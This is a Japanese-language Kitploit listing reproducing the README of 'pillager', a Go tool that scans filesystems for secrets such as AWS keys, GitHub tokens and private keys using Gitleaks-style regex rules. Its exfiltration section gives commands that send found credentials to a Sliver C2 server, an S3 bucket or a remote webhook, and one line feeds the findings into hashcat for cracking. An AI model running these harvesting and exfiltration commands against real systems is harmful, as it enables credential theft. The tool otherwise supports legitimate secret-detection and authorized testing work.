Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
pillager — Goを使ってファイルシステムから機密情報を略奪する 🔍 | Kitploit
ツール/GitHubGitHub/brittonhayes/pillager
脆弱性スキャナーデータ流出情報収集ペネトレーションテストユーティリティとフレームワークシークレット検出レッドチーミング
GitHubbrittonhayes/pillager

pillager

Goを使ってファイルシステムから機密情報を略奪する 🔍

リポジトリを見る
311228ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Pillager

Go Reference Latest Release Go Report Card Tests

Go を使用して、ファイルシステム内の機密情報を奪取 (Pillage) します。

目次

  1. 概要
  2. インストール
  3. 使用方法
  4. 外部送信
  5. ドキュメント

概要

Pillager は、Go の強力な並行処理モデルを活用して、ディレクトリを再帰的に検索し、ファイル内の機密情報を簡単に見つける手段を提供するために設計されています。Pillager は、いくつかの巨人の肩 の上に立っています。Pillager が指定されたパターンに一致するファイルを見つけると、そのファイルは一連の並行ワーカーによってスキャンされます。各ワーカーはジョブキューからファイルの 1 行を受け取り、機密パターンの一致を探します。利用可能なパターンフィルターは pillager.toml ファイルで定義することも、デフォルトのルールセットを使用することもできます。

インストール

Go

システムに Go がセットアップされている場合は、go install で Pillager をインストールできます。

root@kitploit:~
go install github.com/brittonhayes/pillager@latest

Scoop (Windows)

root@kitploit:~
scoop bucket add pillager https://github.com/brittonhayes/pillager-scoop.git
scoop install pillager

Homebrew (OSX/Linux)

root@kitploit:~
brew tap brittonhayes/homebrew-pillager
brew install pillager

Docker イメージ

root@kitploit:~
docker run --rm -it ghcr.io/brittonhayes/pillager:latest hunt .

バイナリをお探しの場合は、最新のリリースからお使いのシステムに合った実行可能ファイルを確認してください。

使用方法

pillager で利用可能なすべてのコマンドを表示するには

root@kitploit:~
# アプリケーション全体の説明を表示
pillager

# 任意のサブコマンドから
pillager [cmd] --help

ユーザーインターフェース

Pillager は、bubbletea で構築されたターミナルユーザーインターフェースを提供します。インタラクティブにシークレットをスキャンしたい場合に使用できます。

asciicast

外部送信

発見したシークレットをリモートの宛先に送信します: Sliver C2 (戦利品/資格情報ストア)、S3/MinIO (クラウドストレージ)、または Webhook (カスタム HTTP エンドポイント)。

root@kitploit:~
# Sliver C2 - 資格情報をパースしてチームサーバーに送信
pillager hunt /target --exfil sliver \
  --sliver-config ~/.sliver-client/configs/operator.cfg

# S3/MinIO - 暗号化してアップロード
pillager hunt /target --exfil s3 \
  --s3-bucket red-team-findings \
  --s3-endpoint https://minio.internal:9000 \
  --exfil-encrypt env:EXFIL_KEY

# Webhook - カスタムエンドポイントに POST
pillager hunt /target --exfil webhook \
  --webhook-url https://your-server.com/findings \
  --webhook-header "Authorization: Bearer token"

セキュリティ: AES-256-GCM 暗号化 (--exfil-encrypt)、デフォルトで TLS、自動メタデータ (ホスト名、タイムスタンプ)


設定

Gitleaks ルール

Pillager は Gitleaks1 のルールを完全にサポートしています。これは pillager.toml ファイルの rules2 セクションで渡すことも、config フラグを空白のままにしてデフォルトのルールセットを使用することもできます。

root@kitploit:~
# pillager.toml
# 基本設定
verbose = false 
redact = false 

# シークレット検出のルール
[[rules]]
description = "AWS Access Key"
id = "aws-access-key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["aws", "credentials"]

[[rules]]
description = "AWS Secret Key"
id = "aws-secret-key"
regex = '''(?i)aws(.{0,20})?(?-i)['\"][0-9a-zA-Z\/+]{40}['\"]'''
tags = ["aws", "credentials"]

[[rules]]
description = "GitHub Token"
id = "github-token"
regex = '''ghp_[0-9a-zA-Z]{36}'''
tags = ["github", "token"]

[[rules]]
description = "Private Key"
id = "private-key"
regex = '''-----BEGIN (?:RSA|OPENSSH|DSA|EC|PGP) PRIVATE KEY( BLOCK)?-----'''
tags = ["key", "private"]

# 許可リストの設定
[allowlist]
paths = [
    ".*/_test\\.go$",
    ".*/testdata/.*",
    ".*\\.md$",
    ".*/vendor/.*"
]
regexes = [
    "EXAMPLE_KEY",
    "DUMMY_SECRET"
] 

組み込みの出力形式

Pillager にはいくつかの組み込み出力形式があります。お好みのものを選んでください!

基本

root@kitploit:~
pillager hunt .

JSON

root@kitploit:~
pillager hunt ./example -f json | jq

JSON 出力は、優れた jq ユーティリティとシームレスに連携するように設計されており、簡単に解析できます。

ワードリスト

root@kitploit:~
# Pillager を使用して、検出結果から改行区切りのワードリストを生成
pillager hunt . -f wordlist 
root@kitploit:~
# Pillager を使用してワードリストを追加し、お気に入りの hashcat 攻撃モードを使用
pillager hunt ./ -f wordlist >> rockyou.txt && hashcat -a 0 hash.txt rockyou.txt
クリックして他の出力形式を表示

JSON 整形

root@kitploit:~
pillager hunt . -f json-pretty

HTML

root@kitploit:~
pillager hunt . -f html > results.html

Markdown

root@kitploit:~
pillager hunt . -f markdown > results.md

CSV

root@kitploit:~
pillager hunt . -f csv > results.csv

カスタム Go テンプレート

root@kitploit:~
pillager hunt . --template "{{ range .}}Secret: {{.Secret}}{{end}}"

ファイルからのカスタム Go テンプレート

root@kitploit:~
pillager hunt . -t "$(cat mytemplate.tmpl)"

カスタムテンプレート

Pillager では、強力な go text/template および sprig 関数を使用して出力形式をカスタマイズできます。以下にいくつかのテンプレート例を示します。

基本

root@kitploit:~
{{ range . -}}
    File: {{ .File }}
    Secret: {{ .Secret}}
    Description: {{ quote .Description }}
{{ end -}}

Markdown スタイル

root@kitploit:~
# Results

{{ range . -}}
    ## {{ .File }}
    - Location: {{.StartLine}}
{{end}}

その他のテンプレート例は templates ディレクトリにあります。

ドキュメント

GoDoc のドキュメントは pkg.go.dev の pillager で入手できます。

開発

Pillager の機能や修正の開発に参加するには、以下の手順で始めてください:

  • Go をインストール
  • Taskfile.dev をインストール
  • CONTRIBUTING.MD を読む

巨人の肩 ⭐

spf13's Cobra

Cobra とは?

Cobra は、git や go ツールと同様の強力なモダン CLI インターフェースを簡単に作成するためのライブラリです。Cobra はまた、Cobra ベースのアプリケーションを迅速に開発するためのアプリケーションスキャフォールディングを生成するアプリケーションでもあります。

これまでに Go で書かれた CLI を見たことがあるなら、それが Cobra で構築されている可能性は非常に高いです。このライブラリは本当にお勧めです。開発者が一貫性があり、動的で、自己文書化されたコマンドラインツールを簡単に作成できるようにします。例としては、kubectl、hugo、GitHub の gh CLI などがあります。

Gitleaks

Gitleaks とは?

Gitleaks1 は、git リポジトリ内のパスワード、API キー、トークンなどのハードコードされたシークレットを検出するための SAST ツールです。

Gitleaks はシークレット漏洩防止に優れたツールです。もし Gitleaks を pre-commit チェッカーとしてまだ実装していないなら、ぜひチェックしてみてください。

なぜ Gitleaks が Pillager に関連するのか?

Pillager は Gitleaks の強力な ルール 機能を実装しながら、見つかったシークレットの表示と処理に異なるアプローチを取っています。デフォルトのルールのベースラインを提供していますが、ユーザーが自分のユースケースに合わせてルールを作成できるようにすることで、Pillager はさらに強力になります。

ベースラインのルールセットについては、含まれているルール2を確認してください。


言うまでもないことですが、あえて言います:Pillager の使用によって生じたいかなる結果に対しても、私は責任を負いません。 このツールは防御目的、教育目的、および関係者全員の同意を得たセキュリティ研究者の使用を目的としています。 Pillager を使用した悪意のある行動は決して容認も推奨もされません。このツールを責任を持って使用し、シークレットをスキャンする前に必ずシステム上の許可を得てください。

その核心において、Pillager は、MITRE ATT&CK3 フレームワークによって文書化された、一般的な資格情報漏洩の原因がシステムに影響を与えているかどうかを判断するのに役立つように設計されています。

MITRE ATT&CK 技法 - T1552,003 - 保護されていない資格情報: Bash 履歴

MITRE ATT&CK 技法 - T1552,001 - 保護されていない資格情報: ファイル内の資格情報

Footnotes

  1. https://raw.githubusercontent.com/brittonhayes/pillager/HEAD/%5BGitleaks%5D(https:/github.com/gitleaks/gitleaks) ↩ ↩2

  2. Gitleaks ルールリファレンス ↩ ↩2

  3. MITRE ATT&CK ウェブサイト ↩

ツールをダウンロード